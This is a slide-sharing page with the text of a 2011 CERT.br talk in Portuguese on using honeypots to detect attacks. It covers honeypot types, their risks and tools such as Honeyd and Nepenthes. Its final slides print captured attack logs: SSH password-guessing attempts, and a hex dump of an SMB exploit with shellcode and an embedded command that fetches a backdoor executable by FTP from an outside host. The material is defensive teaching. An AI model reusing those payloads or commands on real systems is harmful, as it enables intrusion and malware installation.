Palestra vrlivrestudio sergio_gracas
Palestra vrlivrestudio sergio_gracasPalestra vrlivrestudio sergio_gracas
Palestra vrlivrestudio sergio_gracas
 
Realidades aumentada e diminuída
Realidades aumentada e diminuídaRealidades aumentada e diminuída
Realidades aumentada e diminuída
 
Sustentabilidade e SWU
Sustentabilidade e SWUSustentabilidade e SWU
Sustentabilidade e SWU
 

Semelhante a Uso de Honeypots no auxílio à detecção de ataques

Abranet na Mídia 2011 - 2012
Abranet na Mídia   2011 - 2012Abranet na Mídia   2011 - 2012
Abranet na Mídia 2011 - 2012Eduardo Neger
 
Currículo Michel Zacarioto
Currículo Michel ZacariotoCurrículo Michel Zacarioto
Currículo Michel ZacariotoMichel Zacarioto
 
Evolução Tecnológica e a (Falta de) Educação dos Usuários Finais
Evolução Tecnológica e a (Falta de) Educação dos Usuários FinaisEvolução Tecnológica e a (Falta de) Educação dos Usuários Finais
Evolução Tecnológica e a (Falta de) Educação dos Usuários FinaisFecomercioSP
 
ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...
ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...
ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...Allagi Open Innovation Services
 
Artefato PETIC Final Petrobras UO-SEAL
Artefato PETIC Final Petrobras UO-SEAL Artefato PETIC Final Petrobras UO-SEAL
Artefato PETIC Final Petrobras UO-SEAL diegofarias2014
 
V SEGINFO: “Segurança da Informação na Administração Pública Federal”
V SEGINFO: “Segurança da Informação na Administração Pública Federal”V SEGINFO: “Segurança da Informação na Administração Pública Federal”
V SEGINFO: “Segurança da Informação na Administração Pública Federal”Clavis Segurança da Informação
 
Pesquisa Internet 2010 Cetit BR
Pesquisa Internet 2010 Cetit BRPesquisa Internet 2010 Cetit BR
Pesquisa Internet 2010 Cetit BRSérgio Bigaran
 
Apresentação dia 260511
Apresentação dia 260511Apresentação dia 260511
Apresentação dia 260511ITEC ALAGOAS
 
PETIC - Assembléia Legislativa
PETIC - Assembléia LegislativaPETIC - Assembléia Legislativa
PETIC - Assembléia Legislativacabelo.lucas
 
Brochura CNSI Angola
Brochura CNSI AngolaBrochura CNSI Angola
Brochura CNSI AngolaRalf Braga
 
Mapa oportunidades relatorio_sp
Mapa oportunidades  relatorio_spMapa oportunidades  relatorio_sp
Mapa oportunidades relatorio_spPaulo Passos
 

Semelhante a Uso de Honeypots no auxílio à detecção de ataques (20)

Difusão da Informação e Conservação
Difusão da Informação e ConservaçãoDifusão da Informação e Conservação
Difusão da Informação e Conservação
 
Abranet na Mídia 2011 - 2012
Abranet na Mídia   2011 - 2012Abranet na Mídia   2011 - 2012
Abranet na Mídia 2011 - 2012
 
ANETIE - MISSÃO BRASIL'09
ANETIE - MISSÃO BRASIL'09ANETIE - MISSÃO BRASIL'09
ANETIE - MISSÃO BRASIL'09
 
Ctspam
CtspamCtspam
Ctspam
 
Currículo Michel Zacarioto
Currículo Michel ZacariotoCurrículo Michel Zacarioto
Currículo Michel Zacarioto
 
Evolução Tecnológica e a (Falta de) Educação dos Usuários Finais
Evolução Tecnológica e a (Falta de) Educação dos Usuários FinaisEvolução Tecnológica e a (Falta de) Educação dos Usuários Finais
Evolução Tecnológica e a (Falta de) Educação dos Usuários Finais
 
IINTELIGÊNCIA COMPETITIVA
IINTELIGÊNCIA COMPETITIVAIINTELIGÊNCIA COMPETITIVA
IINTELIGÊNCIA COMPETITIVA
 
ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...
ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...
ANPEI - Promovendo a Interação ICTs-Empresas - Gilson Manfio - Open Innovatio...
 
Artefato PETIC Final Petrobras UO-SEAL
Artefato PETIC Final Petrobras UO-SEAL Artefato PETIC Final Petrobras UO-SEAL
Artefato PETIC Final Petrobras UO-SEAL
 
V SEGINFO: “Segurança da Informação na Administração Pública Federal”
V SEGINFO: “Segurança da Informação na Administração Pública Federal”V SEGINFO: “Segurança da Informação na Administração Pública Federal”
V SEGINFO: “Segurança da Informação na Administração Pública Federal”
 
Palestra jcc-senai-bahia
Palestra jcc-senai-bahiaPalestra jcc-senai-bahia
Palestra jcc-senai-bahia
 
Pesquisa Internet 2010 Cetit BR
Pesquisa Internet 2010 Cetit BRPesquisa Internet 2010 Cetit BR
Pesquisa Internet 2010 Cetit BR
 
Apresentação dia 260511
Apresentação dia 260511Apresentação dia 260511
Apresentação dia 260511
 
PETIC - Assembléia Legislativa
PETIC - Assembléia LegislativaPETIC - Assembléia Legislativa
PETIC - Assembléia Legislativa
 
Brochura CNSI Angola
Brochura CNSI AngolaBrochura CNSI Angola
Brochura CNSI Angola
 
Roberts Book
Roberts BookRoberts Book
Roberts Book
 
Mapa oportunidades relatorio_sp
Mapa oportunidades  relatorio_spMapa oportunidades  relatorio_sp
Mapa oportunidades relatorio_sp
 
Roberts Book
Roberts BookRoberts Book
Roberts Book
 
Roberts Book
Roberts BookRoberts Book
Roberts Book
 
Roberts Book
Roberts BookRoberts Book
Roberts Book
 

Mais de Campus Party Brasil

Desenvolvimento de aplicações para o Google App Engine
Desenvolvimento de aplicações para o Google App EngineDesenvolvimento de aplicações para o Google App Engine
Desenvolvimento de aplicações para o Google App EngineCampus Party Brasil
 
Técnicas forenses para a recuperação de arquivos
Técnicas forenses para a recuperação de arquivosTécnicas forenses para a recuperação de arquivos
Técnicas forenses para a recuperação de arquivosCampus Party Brasil
 
Como ganhar dinheiro no mundo mobile?
Como ganhar dinheiro no mundo mobile?Como ganhar dinheiro no mundo mobile?
Como ganhar dinheiro no mundo mobile?Campus Party Brasil
 
Tempestades solares: mitos e verdades
Tempestades solares: mitos e verdadesTempestades solares: mitos e verdades
Tempestades solares: mitos e verdadesCampus Party Brasil
 
A busca por planetas além do sistema solar
A busca por planetas além do sistema solarA busca por planetas além do sistema solar
A busca por planetas além do sistema solarCampus Party Brasil
 
Construção de uma luneta a baixo custo
Construção de uma luneta a baixo custoConstrução de uma luneta a baixo custo
Construção de uma luneta a baixo custoCampus Party Brasil
 
Hardware livre Arduino: eletrônica e robótica com hardware e software livres
Hardware livre Arduino: eletrônica e robótica com hardware e software livresHardware livre Arduino: eletrônica e robótica com hardware e software livres
Hardware livre Arduino: eletrônica e robótica com hardware e software livresCampus Party Brasil
 
Robótica e educação inclusiva
Robótica e educação inclusivaRobótica e educação inclusiva
Robótica e educação inclusivaCampus Party Brasil
 
Fazendo do jeito certo: criando jogos sofisticados com DirectX
Fazendo do jeito certo: criando jogos sofisticados com DirectXFazendo do jeito certo: criando jogos sofisticados com DirectX
Fazendo do jeito certo: criando jogos sofisticados com DirectXCampus Party Brasil
 
Robótica e educação inclusiva
	Robótica e educação inclusiva	Robótica e educação inclusiva
Robótica e educação inclusivaCampus Party Brasil
 
Gestão e monitoramento de redes e dispositivos com Software Livre
Gestão e monitoramento de redes e dispositivos com Software LivreGestão e monitoramento de redes e dispositivos com Software Livre
Gestão e monitoramento de redes e dispositivos com Software LivreCampus Party Brasil
 
Confecção de Circuito Impresso
Confecção de Circuito ImpressoConfecção de Circuito Impresso
Confecção de Circuito ImpressoCampus Party Brasil
 
Virtualização, cloud computig e suas tendencias
Virtualização, cloud computig e suas tendenciasVirtualização, cloud computig e suas tendencias
Virtualização, cloud computig e suas tendenciasCampus Party Brasil
 

Mais de Campus Party Brasil (20)

Wordpress
WordpressWordpress
Wordpress
 
Buracos negros
Buracos negrosBuracos negros
Buracos negros
 
Programação para Atari 2600
Programação para Atari 2600Programação para Atari 2600
Programação para Atari 2600
 
Desenvolvimento de aplicações para o Google App Engine
Desenvolvimento de aplicações para o Google App EngineDesenvolvimento de aplicações para o Google App Engine
Desenvolvimento de aplicações para o Google App Engine
 
Técnicas forenses para a recuperação de arquivos
Técnicas forenses para a recuperação de arquivosTécnicas forenses para a recuperação de arquivos
Técnicas forenses para a recuperação de arquivos
 
Como ganhar dinheiro no mundo mobile?
Como ganhar dinheiro no mundo mobile?Como ganhar dinheiro no mundo mobile?
Como ganhar dinheiro no mundo mobile?
 
Tempestades solares: mitos e verdades
Tempestades solares: mitos e verdadesTempestades solares: mitos e verdades
Tempestades solares: mitos e verdades
 
A busca por planetas além do sistema solar
A busca por planetas além do sistema solarA busca por planetas além do sistema solar
A busca por planetas além do sistema solar
 
Passeio virtual pelo LHC
Passeio virtual pelo LHCPasseio virtual pelo LHC
Passeio virtual pelo LHC
 
Construção de uma luneta a baixo custo
Construção de uma luneta a baixo custoConstrução de uma luneta a baixo custo
Construção de uma luneta a baixo custo
 
Hardware livre Arduino: eletrônica e robótica com hardware e software livres
Hardware livre Arduino: eletrônica e robótica com hardware e software livresHardware livre Arduino: eletrônica e robótica com hardware e software livres
Hardware livre Arduino: eletrônica e robótica com hardware e software livres
 
Robótica e educação inclusiva
Robótica e educação inclusivaRobótica e educação inclusiva
Robótica e educação inclusiva
 
Fazendo do jeito certo: criando jogos sofisticados com DirectX
Fazendo do jeito certo: criando jogos sofisticados com DirectXFazendo do jeito certo: criando jogos sofisticados com DirectX
Fazendo do jeito certo: criando jogos sofisticados com DirectX
 
Blue Via
Blue ViaBlue Via
Blue Via
 
Linux para iniciantes
Linux para iniciantesLinux para iniciantes
Linux para iniciantes
 
Robótica e educação inclusiva
	Robótica e educação inclusiva	Robótica e educação inclusiva
Robótica e educação inclusiva
 
Gestão e monitoramento de redes e dispositivos com Software Livre
Gestão e monitoramento de redes e dispositivos com Software LivreGestão e monitoramento de redes e dispositivos com Software Livre
Gestão e monitoramento de redes e dispositivos com Software Livre
 
Confecção de Circuito Impresso
Confecção de Circuito ImpressoConfecção de Circuito Impresso
Confecção de Circuito Impresso
 
Vida de Programador
Vida de Programador Vida de Programador
Vida de Programador
 
Virtualização, cloud computig e suas tendencias
Virtualização, cloud computig e suas tendenciasVirtualização, cloud computig e suas tendencias
Virtualização, cloud computig e suas tendencias
 

Uso de Honeypots no auxílio à detecção de ataques

  • 1. ı ` Uso de Honeypots no aux´lio a ¸˜ deteccao de ataques Klaus Steding-Jessen jessen@cert.br ¸˜ Esta apresentacao: http://www.cert.br/docs/palestras/ Centro de Estudos, Resposta e Tratamento de Incidentes de Seguranca no Brasil ¸ ¸˜ ¸˜ Nucleo de Informacao e Coordenacao do Ponto br ´ ˆ Comite Gestor da Internet no Brasil ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 1/41
  • 2. Sobre o CERT.br Criado em 1997 como ponto focal nacional para tratar incidentes de seguranca relacionados com as redes ¸ ` conectadas a Internet no Brasil CERT.br Tratamento de Treinamento e Análise de Incidentes Conscientização Tendências − Articulação − Cursos − Consórcio − Apoio à − Palestras de Honeypots recuperação − Documentação − SpamPots − Estatísticas − Reuniões − Honeynet.BR http://www.cert.br/missao.html ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 2/41
  • 3. Estrutura do CGI.br ´ ˆ 01- Ministerio da Ciencia e Tecnologia 11- Provedores de Acesso e Conteudo ´ ´ ¸˜ 02- Ministerio das Comunicacoes 12- Provedores de Infra-estrutura de ˆ 03- Casa Civil da Presidencia da Republica ´ ¸˜ Telecomunicacoes ´ 04- Ministerio da Defesa ´ 13- Industria de Bens de Informatica, ´ ´ ´ 05- Ministerio do Desenvolvimento, Industria e Comercio Exterior ´ ¸˜ Telecomunicacoes e Software ´ 06- Ministerio do Planejamento, Orcamento e Gestao ¸ ˜ 14- Segmento das Empresas Usuarias´ ˆ ¸˜ 07- Agencia Nacional de Telecomunicacoes (Anatel) de Internet ´ 08- Conselho Nacional de Desenvolvimento Cient´fico e Tecnologico 15-18- Representantes do Terceiro Setor ı ´ ´ 09- Forum Nacional de Secretarios Estaduais para Assuntos de C&T 19-21- Representantes da Comunidade ´ 10- Representante de Notorio Saber em Assuntos de Internet ´ Cient´fica e Tecnologica ı ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 3/41
  • 4. ¸˜ Atribuicoes do CGI.br ¸˜ Entre as diversas atribuicoes e responsabilidades definidas no Decreto Presidencial no 4.829, destacam-se: • a proposicao de normas e procedimentos relativos a ¸˜ ` ¸˜ regulamentacao das atividades na internet • ¸˜ ˜ ´ a recomendacao de padroes e procedimentos tecnicos operacionais para a internet no Brasil • ´ o estabelecimento de diretrizes estrategicas relacionadas ao uso e desenvolvimento da internet no Brasil • ¸˜ ˜ ´ a promocao de estudos e padroes tecnicos para a seguranca das redes e servicos no pa´s ¸ ¸ ı • ¸˜ ¸˜ a coordenacao da atribuicao de enderecos internet (IPs) e do ¸ registro de nomes de dom´nios usando <.br> ı • ˜ e disseminacao de informacoes sobre a coleta, organizacao ¸ ¸˜ ¸˜ os servicos internet, incluindo indicadores e estat´sticas ¸ ı ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 4/41
  • 5. Agenda ¸˜ Introducao Conceitos ´ Historico Vantagens e Desvantagens Tipos de Honeypots Riscos Quando Usar Cada Tipo Baixa x Alta Interatividade ¸˜ Implementacao ´ Analise de Logs ˆ Referencias ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 5/41
  • 6. “A Honeypot is a security resource whose value lies in being probed, attacked or compromised.” — Lance Spitzner, Honeypots: Tracking Hackers ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 6/41
  • 7. ¸˜ Poss´veis Aplicacoes ı • ¸˜ Deteccao de probes e ataques automatizados • Captura de ferramentas, novos worms/bots, etc • ¸˜ Comparacao com logs de firewall/IDS • ¸˜ ´ Identificacao de maquinas infectadas/comprometidas • Melhorar a postura de seguranca ¸ ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 7/41
  • 8. ´ Historico (1/2) 1988–1989: “Stalking the Wily Hacker ” e “The Cuckoo’s Egg”, Clifford Stoll ˜ Sistema nao havia sido preparado para ser invadido. ˆ Discrepancia de US$ 0,75 na contabilidade do sistema ` ¸˜ deu in´cio a monitoracao do invasor. ı 1992: “An Evening with Berferd”, Bill Cheswick e “There Be Dragons”, Steven M. Bellovin Sistema preparado para ser invadido, visando o aprendizado. Foram utilizados emuladores de servicos e ¸ ambientes chroot’d. ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 8/41
  • 9. ´ Historico (2/2) 1997–1998: Primeiras ferramentas Deception Toolkit (DTK), Cybercop Sting, NetFacade, and NFR BackOfficer Friendly 1999: In´cio do projeto Honeynet, com 30 membros ı 2001: In´cio da Honeynet Research Alliance ı 2002: Honeyd ´ 2006: Apos 1 ano de desenvolvimento em paralelo Mwcollect e Nepenthes se unem Nepenthes passa a ser o software e Mwcollect uma comunidade sobre esforcos de coleta de malware ¸ 2008: client-side honeypots 2009: Dionaea (em andamento) ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 9/41
  • 10. Vantagens da Tecnologia • ˜ ´ ´ ´ Nao ha trafego “normal” – tudo e suspeito e potencialmente malicioso • Menor volume de dados para analisar do que sensores IDS • Pode prover dados valiosos sobre atacantes ´ – novos metodos – ferramentas usadas, etc • Pode coletar novos tipos de malware • Pode ser usado para capturar spam ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 10/41
  • 11. Desvantagens da Tecnologia • Dependendo do tipo de honeypot, pode ` ¸˜ oferecer riscos a instituicao • Pode demandar muito tempo • ˆ Ve apenas os ataques direcionados ao honeypot ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 11/41
  • 12. Tipos de Honeypots • Baixa Interatividade • Alta Interatividade ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 12/41
  • 13. Honeypots de Baixa Interatividade • Emulam servicos e sistemas ¸ • ˜ O atacante nao tem acesso ao sistema operacional real • ˜ O atacante nao compromete o honeypot (idealmente) • ´ Facil de configurar e manter • Baixo risco • ¸˜ ˜ Informacoes obtidas sao limitadas • Exemplos: “listeners”, emuladores de servicos, Honeyd, Nepenthes ¸ ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 13/41
  • 14. Honeypots de Alta Interatividade • Mais dif´ceis de instalar e manter ı • Maior risco • ¸˜ Necessitam mecanismos de contencao – para evitar que sejam usados para lancamento de ataques contra outras redes ¸ • ¸˜ Coleta extensa de informacoes • Exemplos: honeynets e honeynets virtuais ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 14/41
  • 15. Honeynets “A Honeynet is nothing more than one type of honeypot. Specifically, it is a high interaction honeypot designed primarily for research, to gather information on the enemy. [. . . ] A Honeynet is different from traditional honeypots, it is what we would categorize as a research honeypot.” – Lance Spitzner, Know Your Enemy: Honeynets ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 15/41
  • 16. Caracter´sticas das Honeynets ı • ´ ¸˜ Redes com multiplos sistemas e aplicacoes • ¸˜ ´ Mecanismo robusto de contencao de trafego – pode possuir multiplas camadas de controle ´ – frequentemente chamado de honeywall ¨ • Mecanismos de alerta e de captura de dados ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 16/41
  • 17. Requisitos das Honeynets • ˜ ¸˜ Nao haver poluicao de dados ´ – sem testes ou trafego gerado pelos administradores • Controle – deve impedir os ataques partindo da honeynet contra outros sistemas – precisa ser transparente para o atacante ˜ – pode nao enganar todos os atacantes – deve permitir que o atacante “trabalhe”, baixe ferramentas, conecte no IRC, etc. – deve possuir multiplas camadas de contencao ´ ¸˜ • Captura de dados • Coleta de dados • Mecanismos de alerta ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 17/41
  • 18. Riscos ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 18/41
  • 19. Riscos – Baixa Interatividade • Comprometimento do Sistema Operacional “real” do honeypot • O software do honeypot pode ter vulnerabilidades • Atrair atacantes para a sua rede ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 19/41
  • 20. Riscos – Alta Interatividade (1/2) • Um erro nos mecanismos de controle ou na ¸˜ configuracao pode: – permitir que o honeypot seja usado para prejudicar outras redes ¸˜ – abrir uma porta para a rede da sua organizacao • Um comprometimento associado com sua ¸˜ organizacao pode afetar a sua imagem ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 20/41
  • 21. Riscos – Alta Interatividade (2/2) ˜ Porque sao mais arriscados: ¸˜ • N´vel de interacao – o atacante tem controle ı ´ total sobre a maquina • Complexos de instalar e manter – diversas tecnologias interagindo – multiplos pontos de falha ´ • Novos ataques e ameacas inesperadas ¸ ˜ podem nao ser contidos ou vistos ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 21/41
  • 22. Quando Usar Cada Tipo ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 22/41
  • 23. Uso – Baixa Interatividade • ˜ ´ Nao ha hardware suficiente para montar uma honeynet • ˜ ´ O risco de outro tipo de honeypot nao e ´ aceitavel • ´ ´ O proposito e: – identificar scans e ataques automatizados – enganar script kiddies – atrair atacantes para longe de sistemas importantes – coletar assinaturas de ataques ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 23/41
  • 24. Uso – Alta Interatividade • ´ ´ O proposito e observar: – o comportamento e as atividades de atacantes ˜ – um comprometimento real (nao emulado) – conversas de IRC • Coletar material para pesquisa e ´ treinamento em analise de artefatos e ´ analise forense ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 24/41
  • 25. Baixa x Alta Interatividade Caracter´sticas ı Baixa Interatividade Alta Interatividade ¸˜ Instalacao ´ facil mais dif´cil ı ¸˜ Manutencao ´ facil trabalhosa ¸˜ ¸˜ Obtencao de informacoes limitada extensiva Necessidade de mecanis- ˜ nao sim ¸˜ mos de contencao Atacante tem acesso ao ˜ nao (em teoria) sim S.O. real ¸˜ Aplicacoes e servicos ofe- ¸ emulados reais recidos Atacante pode comprome- ˜ nao (em teoria) sim ter o honeypot ¸˜ Risco da organizacao so- baixo alto frer um comprometimento ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 25/41
  • 26. ¸˜ Implementacao ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 26/41
  • 27. Honeyd “Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their personality can be adapted so that they appear to be running certain operating systems. Honeyd enables a single host to claim multiple addresses - I have tested up to 65536 - on a LAN for network simulation.” • http://www.honeyd.org/ ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 27/41
  • 28. Honeyd: honeyd.conf ### default create default set default personality "Microsoft Windows XP Professional" set default default tcp action reset set default default udp action reset set default default icmp action open ### Linux create linux set linux personality "Linux Kernel 2.4.3 SMP (RedHat)" set linux default tcp action reset set linux default udp action reset set linux default icmp action open add linux tcp port 111 open bind 192.168.0.1 linux bind 192.168.0.2 linux ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 28/41
  • 29. Nepenthes “Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities.” • http://nepenthes.carnivore.it/ ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 29/41
  • 30. Dionaea “Dionaea is meant to be a nepenthes successor, embedding python as scripting language, using libemu to detect shellcodes, supporting ipv6 and tls” • http://dionaea.carnivore.it/ ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 30/41
  • 31. ´ Analise de Logs ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 31/41
  • 32. Logs Honeyd: exemplos (cont) 2011-01-16-20:56:41.3072 tcp(6) - 85.185.173.28 4975 192.168.0.57 4899: 48 S 2011-01-16-20:56:41.3291 tcp(6) - 85.185.173.28 4510 192.168.0.55 4899: 48 S 2011-01-16-20:56:41.3337 tcp(6) - 85.185.173.28 4359 192.168.0.48 4899: 48 S 2011-01-16-20:56:41.4412 tcp(6) - 85.185.173.28 4890 192.168.0.56 4899: 48 S 2011-01-16-20:56:41.4421 tcp(6) - 85.185.173.28 1036 192.168.0.59 4899: 48 S 2011-01-16-20:56:41.4453 tcp(6) - 85.185.173.28 4473 192.168.0.54 4899: 48 S 2011-01-16-20:56:41.4479 tcp(6) - 85.185.173.28 1046 192.168.0.62 4899: 48 S 2011-01-16-20:56:41.4488 tcp(6) - 85.185.173.28 4364 192.168.0.51 4899: 48 S 2011-01-16-20:56:41.4669 tcp(6) - 85.185.173.28 1031 192.168.0.58 4899: 48 S 2011-01-16-20:56:41.4688 tcp(6) - 85.185.173.28 4365 192.168.0.52 4899: 48 S 2011-01-16-20:56:41.4733 tcp(6) - 85.185.173.28 1042 192.168.0.61 4899: 48 S 2011-01-16-20:56:41.4762 tcp(6) - 85.185.173.28 1039 192.168.0.60 4899: 48 S ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 32/41
  • 33. Logs Honeyd: exemplos (cont) T 2011/01/16 18:33:54.407677 218.12.198.70:53274 -> 192.168.0.61:22 [AP] SSH-2.0-libssh-0.11.. T 2011/01/16 20:36:43.600119 62.38.27.161:49681 -> 192.168.0.61:22 [AP] SSH-2.0-libssh-0.1.. T 2011/01/16 20:36:43.623727 62.38.27.161:55708 -> 192.168.0.56:22 [AP] SSH-2.0-libssh-0.1.. T 2011/01/16 20:36:43.640609 62.38.27.161:58963 -> 192.168.0.54:22 [AP] SSH-2.0-libssh-0.1.. T 2011/01/16 20:36:43.651256 62.38.27.161:60378 -> 192.168.0.58:22 [AP] SSH-2.0-libssh-0.1.. T 2011/01/16 20:36:43.652722 62.38.27.161:60375 -> 192.168.0.62:22 [AP] SSH-2.0-libssh-0.1.. T 2011/01/16 20:36:43.653342 62.38.27.161:53103 -> 192.168.0.59:22 [AP] SSH-2.0-libssh-0.1.. ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 33/41
  • 34. Logs Honeyd: exemplos (cont) Jan 17 13:37:57 hpot sshd: ’luisa’ (password ’luisa123’) from 201.62.100.155 Jan 17 13:38:00 hpot sshd: ’luisa’ (password ’123456’) from 201.62.100.155 Jan 17 13:38:02 hpot sshd: ’luisa’ (password ’123’) from 201.62.100.155 Jan 17 13:38:05 hpot sshd: ’armando’ (password ’armando’) from 201.62.100.155 Jan 17 13:38:07 hpot sshd: ’armando’ (password ’armando123’) from 201.62.100.155 Jan 17 13:38:09 hpot sshd: ’armando’ (password ’123456’) from 201.62.100.155 Jan 17 13:38:12 hpot sshd: ’armando’ (password ’123’) from 201.62.100.155 Jan 17 13:38:14 hpot sshd: ’matheos’ (password ’matheos’) from 201.62.100.155 Jan 17 13:38:16 hpot sshd: ’matheos’ (password ’matheos123’) from 201.62.100.155 Jan 17 13:38:19 hpot sshd: ’matheos’ (password ’123456’) from 201.62.100.155 Jan 17 13:38:21 hpot sshd: ’matheos’ (password ’123’) from 201.62.100.155 Jan 17 13:38:23 hpot sshd: ’mateo’ (password ’mateo’) from 201.62.100.155 Jan 17 13:38:26 hpot sshd: ’mateo’ (password ’mateo123’) from 201.62.100.155 Jan 17 13:38:28 hpot sshd: ’mateo’ (password ’123456’) from 201.62.100.155 Jan 17 13:38:30 hpot sshd: ’mateo’ (password ’123’) from 201.62.100.155 Jan 17 13:38:32 hpot sshd: ’angela’ (password ’angela’) from 201.62.100.155 Jan 17 13:38:35 hpot sshd: ’angela’ (password ’angela123’) from 201.62.100.155 Jan 17 13:38:37 hpot sshd: ’angela’ (password ’123456’) from 201.62.100.155 Jan 17 13:38:39 hpot sshd: ’angela’ (password ’123’) from 201.62.100.155 ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 34/41
  • 35. Logs Honeyd: exemplos (cont) T 2011/01/16 12:05:54.255121 113.53.231.82:50210 -> 192.168.0.62:80 [AP] GET //cgi/stats/awstats.pl HTTP/1.1.. Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate.. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98).. Host: 192.168.0.62..Connection: Close.... T 2011/01/16 12:05:54.257410 113.53.231.82:44469 -> 192.168.0.55:80 [AP] GET //cgi/stats/awstats.pl HTTP/1.1.. Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate.. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98).. Host: 192.168.0.55..Connection: Close.... T 2011/01/16 12:05:54.265120 113.53.231.82:52495 -> 192.168.0.54:80 [AP] GET //cgi/stats/awstats.pl HTTP/1.1.. Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate.. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98).. Host: 192.168.0.54..Connection: Close.... ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 35/41
  • 36. Logs Nepenthes: exemplos [11022008 03:50:46 debug net mgr] Accepted Connection Socket TCP (accept) 200.104.169.24:3775 -> hpot:445 [11022008 03:50:56 info down mgr] Handler ftp download handler will download ftp://200.104.169.24:21910/msnnmaneger.exe [11022008 03:50:56 info down handler] url has ftp://200.104.169.24:21910/msnnmaneger.exe ip, we will download it now [2008-02-11T03:51:25] 200.104.169.24 -> hpot ftp://200.104.169.24:21910/msnnmaneger.exe 62a00070154ecd8e3b5bda83432ba4c3 AVG - - BackDoor.RBot.AX BitDefender - - DeepScan:Generic.Malware.KIFWXg.44C81B79 CAT-QuickHeal - - Backdoor.SdBot.gen ClamAV - - PUA.Packed.Themida F-Secure - - Backdoor:W32/Rbot.GJJ Ikarus - - Generic.Sdbot NOD32v2 - - a variant of Win32/Packed.Themida Prevx1 - - BACKDOOR.DIMPY.WIN32VBSY.Q Sophos - - Sus/ComPack Sunbelt - - VIPRE.Suspicious TheHacker - - W32/Behav-Heuristic-064 VirusBuster - - Worm.Rbot.VDL ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 36/41
  • 37. Logs Nepenthes: exemplos Feb 11 03:50:56.360974 200.104.169.24.3788 > hpot.445 0020: 5010 faf0 fcce 0000 ff53 4d42 7300 0000 .........SMBs... 0030: 0018 07c8 0000 0000 0000 0000 0000 0000 ................ 0040: 0000 3713 0000 0000 0cff 0000 0004 110a ................ 0050: 0000 0000 0000 007e 1000 0000 00d4 0000 .......~........ 0060: 807e 1060 8210 7a06 062b 0601 0505 02a0 .~....z..+..... 0070: 8210 6e30 8210 6aa1 8210 6623 8210 6203 ..n0..j¡..f#..b. 0080: 8204 0100 4141 4141 4141 4141 4141 4141 ....AAAAAAAAAAAA 0090: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA [...] 0500: 0000 8b40 3405 7c00 0000 8b68 3c5f 31f6 ...@4.|....h<_1. 0510: 6056 eb0d 68ef cee0 6068 98fe 8a0e 57ff ....h....h....W. 0520: e7e8 eeff ffff 636d 6420 2f63 2065 6368 ......cmd /c ech 0530: 6f20 6f70 656e 2030 2e30 2e30 2e30 2032 o open 0.0.0.0 2 0540: 3139 3130 203e 3e20 6969 2026 6563 686f 1910 >> ii &echo 0550: 2075 7365 7220 6120 6120 3e3e 2069 6920 user a a >> ii 0560: 2665 6368 6f20 6269 6e61 7279 203e 3e20 &echo binary >> 0570: 6969 2026 6563 686f 2067 6574 206d 736e ii &echo get msn 0580: 6e6d 616e 6567 6572 2e65 7865 203e 3e20 nmaneger.exe >> 0590: 6969 2026 6563 686f 2062 7965 ii &echo bye ˜ Campus Party Brasil 